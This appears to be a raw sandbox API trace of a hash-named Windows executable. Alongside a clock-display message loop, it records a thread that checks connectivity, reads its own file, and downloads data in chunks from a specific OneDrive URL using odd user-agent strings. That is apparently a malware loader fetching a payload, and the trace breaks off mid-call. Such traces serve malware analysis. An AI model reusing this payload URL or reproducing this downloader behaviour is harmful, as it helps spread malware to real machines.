TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.046] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.046] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x313)) [0142.046] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x314)) [0142.047] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.067] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.067] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.067] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x328)) [0142.067] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x328)) [0142.067] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.077] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.077] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.077] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x332)) [0142.077] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x332)) [0142.077] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.096] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.096] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.096] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x345)) [0142.096] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x345)) [0142.096] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.107] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.107] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.107] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x350)) [0142.107] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x350)) [0142.107] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.128] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.128] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.128] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x365)) [0142.128] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x365)) [0142.128] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.148] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.148] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.148] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x379)) [0142.148] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x379)) [0142.148] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.157] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.157] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.157] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x382)) [0142.157] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x382)) [0142.157] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.168] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.168] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.168] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x38d)) [0142.168] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x38d)) [0142.168] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.190] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.190] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.190] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3a3)) [0142.190] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3a3)) [0142.190] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.200] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.200] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.200] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3ad)) [0142.200] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3ad)) [0142.201] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.221] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.221] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.221] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3c2)) [0142.221] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3c2)) [0142.221] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.232] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.232] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.232] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3cd)) [0142.232] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3cd)) [0142.232] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0142.245] TranslateMessage (lpMsg=0x2347a14) returned 0 [0142.245] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0142.245] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3da)) [0142.245] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xb, wMilliseconds=0x3da)) [0142.245] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0143.015] TranslateMessage (lpMsg=0x2347a14) returned 0 [0143.015] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0143.015] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x2f4)) [0143.015] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x2f4)) [0143.016] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0143.016] GetDC (hWnd=0x0) returned 0xa0100d0 [0143.016] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0143.016] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0143.016] GetSysColor (nIndex=8) returned 0x0 [0143.016] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0143.016] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0143.016] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0143.016] UnrealizeObject (h=0x2d10099f) returned 1 [0143.017] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0143.017] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0143.017] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0143.017] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:12 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:12 PM", lprc=0x19f5bd) returned 13 [0143.017] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0143.017] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0143.017] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0143.017] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0143.017] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0143.018] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0143.019] TranslateMessage (lpMsg=0x2347a14) returned 0 [0143.019] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0143.019] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x2f8)) [0143.019] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x2f8)) [0143.019] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0143.029] TranslateMessage (lpMsg=0x2347a14) returned 0 [0143.029] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0143.029] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x302)) [0143.029] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x302)) [0143.029] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0143.042] TranslateMessage (lpMsg=0x2347a14) returned 0 [0143.042] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0143.042] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x30f)) [0143.042] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0xc, wMilliseconds=0x30f)) [0143.042] GetMessageA (lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 2 os_tid = 0x13e4 Thread: id = 3 os_tid = 0x13f4 Thread: id = 4 os_tid = 0x320 Thread: id = 5 os_tid = 0xbb4 [0112.999] QueryPerformanceCounter (in: lpPerformanceCount=0x416fdbc | out: lpPerformanceCount=0x416fdbc*=3476949542339) returned 1 [0113.002] SetErrorMode (uMode=0x8000) returned 0x0 [0113.002] LoadLibraryA (lpLibFileName="URL") returned 0x6f8b0000 [0113.004] SetErrorMode (uMode=0x0) returned 0x8000 [0113.004] GetProcAddress (hModule=0x6f8b0000, lpProcName="InetIsOffline") returned 0x6f8b1430 [0113.005] InetIsOffline () returned 0x0 [0114.274] FreeLibrary (hLibModule=0x6f8b0000) returned 1 [0114.274] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x416fcb4, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0114.274] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0114.274] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6706c8 [0114.274] GetFileSize (in: hFile=0x33c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf6800 [0114.274] VirtualAlloc (lpAddress=0x3f74000, dwSize=0xf8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3f74000 [0114.277] ReadFile (in: hFile=0x33c, lpBuffer=0x3f706b8, nNumberOfBytesToRead=0xf6800, lpNumberOfBytesRead=0x416fd9c, lpOverlapped=0x0 | out: lpBuffer=0x3f706b8*, lpNumberOfBytesRead=0x416fd9c*=0xf6800, lpOverlapped=0x0) returned 1 [0114.293] CloseHandle (hObject=0x33c) returned 1 [0114.294] VirtualAlloc (lpAddress=0x0, dwSize=0x3e0000, flAllocationType=0x2000, flProtect=0x1) returned 0x4270000 [0114.295] VirtualAlloc (lpAddress=0x4270000, dwSize=0x3dc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4270000 [0114.306] VirtualFree (lpAddress=0x4068000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0114.365] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4650000 [0114.365] VirtualAlloc (lpAddress=0x4650000, dwSize=0xdc000, flAllocationType=0x1000, flProtect=0x4) returned 0x4650000 [0114.368] VirtualAlloc (lpAddress=0x464c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x464c000 [0114.380] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x4750000 [0114.380] VirtualAlloc (lpAddress=0x4750000, dwSize=0xd4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4750000 [0114.383] VirtualAlloc (lpAddress=0x472c000, dwSize=0x24000, flAllocationType=0x1000, flProtect=0x4) returned 0x472c000 [0114.383] VirtualFree (lpAddress=0x4728000, dwSize=0x4000, dwFreeType=0x4000) returned 1 [0114.410] VirtualFree (lpAddress=0x4750000, dwSize=0xd4000, dwFreeType=0x4000) returned 1 [0114.426] VirtualFree (lpAddress=0x4748000, dwSize=0x8000, dwFreeType=0x4000) returned 1 [0114.426] VirtualFree (lpAddress=0x4750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.429] InternetOpenA (lpszAgent="lVali", dwAccessType=0x4, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0114.431] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="https://onedrive.live.com/download?cid=FB5C5DB4B53601EB&resid=FB5C5DB4B53601EB%21540&authkey=ANMH1ELgXQdJslw", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x200, dwContext=0x0) returned 0xcc000c [0120.201] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2347e60, lpdwBufferLength=0x2348068, lpdwIndex=0x2348064*=0x0 | out: lpBuffer=0x2347e60*, lpdwBufferLength=0x2348068*=0x3, lpdwIndex=0x2348064*=0x0) returned 1 [0120.206] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0120.216] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0120.218] InternetOpenA (lpszAgent="12", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0120.218] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="https://onedrive.live.com/download?cid=FB5C5DB4B53601EB&resid=FB5C5DB4B53601EB%21540&authkey=ANMH1ELgXQdJslw", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x80000000, dwContext=0x0) returned 0xcc000c [0121.715] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.717] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.721] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.722] VirtualAlloc (lpAddress=0x4748000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4748000 [0121.722] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.723] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.724] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.725] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.726] VirtualAlloc (lpAddress=0x474c000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x474c000 [0121.726] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.727] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x2347e40 | out: lpBuffer=0x2347a40*, lpdwNumberOfBytesRead=0x2347e40*=0x400) returned 1 [0121.728] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2347a40, dwNumberOfBytesToRead=0x400, 